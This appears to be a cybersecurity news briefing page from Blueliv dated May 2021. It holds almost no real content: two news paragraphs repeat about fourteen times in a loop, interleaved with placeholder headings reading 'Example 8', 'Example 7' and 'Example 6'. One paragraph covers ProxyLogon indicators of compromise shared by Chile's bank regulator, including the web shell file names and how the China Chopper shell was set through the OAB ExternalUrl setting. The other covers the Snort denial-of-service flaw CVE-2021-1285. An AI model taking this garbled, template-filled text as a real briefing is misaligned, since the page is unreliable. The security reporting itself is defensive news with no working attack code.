Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday,   May 12th,   2021

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 6

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 6

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 6

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 6

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 6

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 6

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 6

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 6

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 6

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 6

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 6

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 6

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 6

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

CMF further states that they are investigating the breach and have been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While indicators of compromise (IOC) will have different file hashes for each victim, in many attacks, the file names have been the same. Web shells using the names 'error_page.asp' and 'supp0rt.aspx' have been used in numerous ProxyLogon attacks, and for the most are part, are identical with only a few changes specific to the victim. These files are Microsoft Exchange Offline Address Books (OAB), whose ExternalUrl setting has been changed to the China Chopper web shell. This web shell allows threat actors to execute commands on the compromised Microsoft Exchange server remotely by visiting the URL configured in the ExternalURL setting.

Example 8

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.

Example 7

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. The vulnerability, tracked as CVE-2021-1285, can be exploited by an unauthenticated, adjacent attacker to trigger a DoS condition by sending it specially crafted Ethernet frames. “The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device.” reads the advisory published by Cisco.